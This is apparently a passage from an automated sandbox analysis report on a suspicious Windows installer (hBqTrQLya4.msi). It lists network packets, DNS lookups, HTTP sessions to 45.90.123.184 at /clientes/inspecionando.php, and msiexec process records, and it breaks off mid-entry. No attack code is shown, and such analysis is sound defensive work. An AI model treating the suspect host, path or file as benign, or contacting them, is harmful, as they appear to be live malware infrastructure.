Jul 4, 2024 09:13:18.504698038 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:21.177022934 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:21.177097082 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:21.177160025 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:21.187824011 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:21.187843084 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:21.256779909 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203
Jul 4, 2024 09:13:21.866579056 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:21.879156113 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:21.879172087 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:21.880229950 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:21.880431890 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:21.881711960 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:21.881789923 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:21.944118023 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:21.944127083 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:22.053587914 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:22.103101015 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:22.103132010 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:22.103368044 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:22.104912996 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:22.104923010 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:22.506597996 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jul 4, 2024 09:13:22.758142948 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:22.758236885 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:22.827362061 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:22.827378988 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:22.827725887 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:23.001243114 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:23.108735085 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:23.152515888 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:23.293217897 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:23.293495893 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:23.293550014 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:23.350747108 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:23.350776911 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:23.350788116 CEST | 49713 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:23.350796938 CEST | 443 | 49713 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:23.462645054 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:23.462919950 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:25.436665058 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:25.436717987 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:25.440908909 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:25.441086054 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:25.441096067 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.084521055 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.084650993 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:26.186167002 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:26.186182976 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.186558962 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.187727928 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:26.232508898 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.373096943 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.373189926 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.376931906 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:26.823926926 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:26.823926926 CEST | 49714 | 443 | 192.168.2.7 | 2.19.104.72
Jul 4, 2024 09:13:26.823956013 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:26.823966026 CEST | 443 | 49714 | 2.19.104.72 | 192.168.2.7
Jul 4, 2024 09:13:29.717602968 CEST | 49702 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:13:29.722524881 CEST | 80 | 49702 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:13:31.776055098 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:31.776120901 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:31.776304960 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:34.505773067 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200
Jul 4, 2024 09:13:34.917325020 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:34.917362928 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:34.917448044 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:34.918683052 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:34.918699026 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:35.676695108 CEST | 49712 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:13:35.676724911 CEST | 443 | 49712 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:13:35.723547935 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:35.723625898 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:35.897603035 CEST | 49701 | 443 | 192.168.2.7 | 104.98.116.138
Jul 4, 2024 09:13:35.900407076 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:35.900430918 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:35.900747061 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:35.902517080 CEST | 443 | 49701 | 104.98.116.138 | 192.168.2.7
Jul 4, 2024 09:13:36.053020000 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:37.291672945 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:37.332509041 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557187080 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557219028 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557228088 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557248116 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557257891 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557260990 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557271004 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:37.557293892 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557311058 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:37.557349920 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:37.557818890 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557826996 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.557899952 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:37.557907104 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.558214903 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:37.558263063 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:38.587445021 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:38.587486982 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:13:38.587498903 CEST | 49715 | 443 | 192.168.2.7 | 40.68.123.157
Jul 4, 2024 09:13:38.587506056 CEST | 443 | 49715 | 40.68.123.157 | 192.168.2.7
Jul 4, 2024 09:14:01.945453882 CEST | 49703 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:14:01.950304031 CEST | 80 | 49703 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:14:09.096734047 CEST | 80 | 49703 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:14:09.096790075 CEST | 49703 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:14:10.195489883 CEST | 49703 | 80 | 192.168.2.7 | 45.90.123.184
Jul 4, 2024 09:14:10.201065063 CEST | 80 | 49703 | 45.90.123.184 | 192.168.2.7
Jul 4, 2024 09:14:19.178488016 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:19.178534031 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:19.178601980 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:19.178922892 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:19.178936958 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:19.872009039 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:19.872102976 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:19.874769926 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:19.874779940 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:19.875076056 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:19.927958012 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:20.536623001 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:20.580504894 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766525030 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766556025 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766565084 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766580105 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766587973 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766594887 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766616106 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:20.766629934 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.766676903 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:20.767834902 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.767884970 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.767909050 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:20.767915964 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.767946005 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:20.768290997 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:20.768337965 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:21.226216078 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:21.226267099 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:21.226363897 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:21.226603031 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:21.226624012 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:21.401186943 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:21.401221991 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:21.401237011 CEST | 49720 | 443 | 192.168.2.7 | 52.165.165.26
Jul 4, 2024 09:14:21.401243925 CEST | 443 | 49720 | 52.165.165.26 | 192.168.2.7
Jul 4, 2024 09:14:21.874496937 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:21.874902964 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:21.874929905 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:21.875252008 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:21.876671076 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:21.876739025 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:21.926924944 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:31.826903105 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:31.826982975 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Jul 4, 2024 09:14:31.827039957 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:32.205214024 CEST | 49723 | 443 | 192.168.2.7 | 142.250.186.132
Jul 4, 2024 09:14:32.205251932 CEST | 443 | 49723 | 142.250.186.132 | 192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 4, 2024 09:13:15.636626005 CEST | 123 | 123 | 192.168.2.7 | 51.145.123.29
Jul 4, 2024 09:13:16.185798883 CEST | 123 | 123 | 51.145.123.29 | 192.168.2.7
Jul 4, 2024 09:13:16.938446045 CEST | 53 | 55214 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:13:17.158638954 CEST | 53 | 59615 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:13:17.183974028 CEST | 123 | 123 | 192.168.2.7 | 51.145.123.29
Jul 4, 2024 09:13:17.356216908 CEST | 123 | 123 | 51.145.123.29 | 192.168.2.7
Jul 4, 2024 09:13:18.180440903 CEST | 53 | 60599 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:13:21.168617964 CEST | 62968 | 53 | 192.168.2.7 | 1.1.1.1
Jul 4, 2024 09:13:21.169058084 CEST | 62552 | 53 | 192.168.2.7 | 1.1.1.1
Jul 4, 2024 09:13:21.175471067 CEST | 53 | 62968 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:13:21.175813913 CEST | 53 | 62552 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:13:35.684933901 CEST | 53 | 53000 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:13:54.640542984 CEST | 53 | 58943 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:14:11.309289932 CEST | 138 | 138 | 192.168.2.7 | 192.168.2.255
Jul 4, 2024 09:14:16.729326963 CEST | 53 | 62558 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:14:17.030606031 CEST | 53 | 51255 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:14:44.955219984 CEST | 53 | 54012 | 1.1.1.1 | 192.168.2.7
Jul 4, 2024 09:15:29.965734959 CEST | 53 | 55199 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 4, 2024 09:13:21.168617964 CEST | 192.168.2.7 | 1.1.1.1 | 0xedb3 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Jul 4, 2024 09:13:21.169058084 CEST | 192.168.2.7 | 1.1.1.1 | 0x25f7 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 4, 2024 09:13:21.175471067 CEST | 1.1.1.1 | 192.168.2.7 | 0xedb3 | No error (0) | www.google.com | | 142.250.186.132 | A (IP address) | IN (0x0001) | false
Jul 4, 2024 09:13:21.175813913 CEST | 1.1.1.1 | 192.168.2.7 | 0x25f7 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
                                                                    • fs.microsoft.com
                                                                    • slscr.update.microsoft.com
                                                                    • 45.90.123.184
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49702 | 45.90.123.184 | 80 | 8024 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
Jul 4, 2024 09:13:17.167999983 CEST | 454 | OUT | GET /clientes/inspecionando.php HTTP/1.1
Host: 45.90.123.184
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Jul 4, 2024 09:13:17.631432056 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Thu, 04 Jul 2024 07:13:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Jul 4, 2024 09:13:17.750442982 CEST | 396 | OUT | GET /favicon.ico HTTP/1.1
Host: 45.90.123.184
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://45.90.123.184/clientes/inspecionando.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Jul 4, 2024 09:13:17.945689917 CEST | 491 | IN | HTTP/1.1 404 Not Found
Date: Thu, 04 Jul 2024 07:13:17 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 275
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 45.90.123.184 Port 80</address></body></html>
Jul 4, 2024 09:13:18.235829115 CEST | 538 | OUT | GET /clientes/inspecionando.php HTTP/1.1
Host: 45.90.123.184
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://45.90.123.184/clientes/inspecionando.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Jul 4, 2024 09:13:18.457103968 CEST | 202 | IN | HTTP/1.1 200 OK
Date: Thu, 04 Jul 2024 07:13:18 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49703 | 45.90.123.184 | 80 | 8024 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
Jul 4, 2024 09:14:01.945453882 CEST | 6 | OUT | Data Raw: 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49713 | 2.19.104.72 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-07-04 07:13:23 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
2024-07-04 07:13:23 UTC | 466 | IN | HTTP/1.1 200 OK
Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
Content-Type: application/octet-stream
ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
Last-Modified: Tue, 16 May 2017 22:58:00 GMT
Server: ECAcc (lpl/EF06)
X-CID: 11
X-Ms-ApiVersion: Distribute 1.2
X-Ms-Region: prod-neu-z1
Cache-Control: public, max-age=32215
Date: Thu, 04 Jul 2024 07:13:23 GMT
Connection: close
X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49714 | 2.19.104.72 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-07-04 07:13:26 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
Range: bytes=0-2147483646
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
2024-07-04 07:13:26 UTC | 534 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 16 May 2017 22:58:00 GMT
ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
ApiVersion: Distribute 1.1
Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
Cache-Control: public, max-age=32265
Date: Thu, 04 Jul 2024 07:13:26 GMT
Content-Length: 55
Connection: close
X-CID: 2
2024-07-04 07:13:26 UTC | 55 | IN | Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49715 | 40.68.123.157 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-07-04 07:13:37 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-07-04 07:13:37 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
MS-CorrelationId: 8cae2b6d-4306-46d3-aae8-084158bf22a6
MS-RequestId: 8d3288cd-6672-4a22-bfb1-204492aa6ce3
MS-CV: H6aC0g5r8Ey4UDIu.0
X-Microsoft-SLSClientCache: 2880
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Thu, 04 Jul 2024 07:13:37 GMT
Connection: close
Content-Length: 24490
2024-07-04 07:13:37 UTC | 15824 | IN | Data Raw: [binary payload of environment.cab, not reproduced]
2024-07-04 07:13:37 UTC | 8666 | IN | Data Raw: [binary payload of environment.cab, not reproduced]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49720 | 52.165.165.26 | 443 | |

Timestamp | Bytes transferred | Direction | Data
2024-07-04 07:14:20 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=FsnEL8SGae9S84c&MD=S8EAWlWO HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Host: slscr.update.microsoft.com
2024-07-04 07:14:20 UTC | 560 | IN | HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/octet-stream
Expires: -1
Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
MS-CorrelationId: ac0318f9-bd85-4646-a043-762d0ac6b350
MS-RequestId: 97f5f3c7-05df-46a3-8d69-7e31efd9709f
MS-CV: D8d4PqxUBkqQyUAl.0
X-Microsoft-SLSClientCache: 1440
Content-Disposition: attachment; filename=environment.cab
X-Content-Type-Options: nosniff
Date: Thu, 04 Jul 2024 07:14:19 GMT
Connection: close
Content-Length: 30005
2024-07-04 07:14:20 UTC | 15824 | IN | Data Raw: [binary payload of environment.cab, not reproduced]
2024-07-04 07:14:20 UTC | 14181 | IN | Data Raw: [binary payload of environment.cab, not reproduced]


                                                                    Target ID:0
                                                                    Start time:03:13:07
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\hBqTrQLya4.msi"
                                                                    Imagebase:0x7ff7dbab0000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:03:13:07
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                    Imagebase:0x7ff7dbab0000
                                                                    File size:69'632 bytes
                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:03:13:09
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6BAD67B4EB347E35097C3D98448E2079
                                                                    Imagebase:0x280000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:12
                                                                    Start time:03:13:11
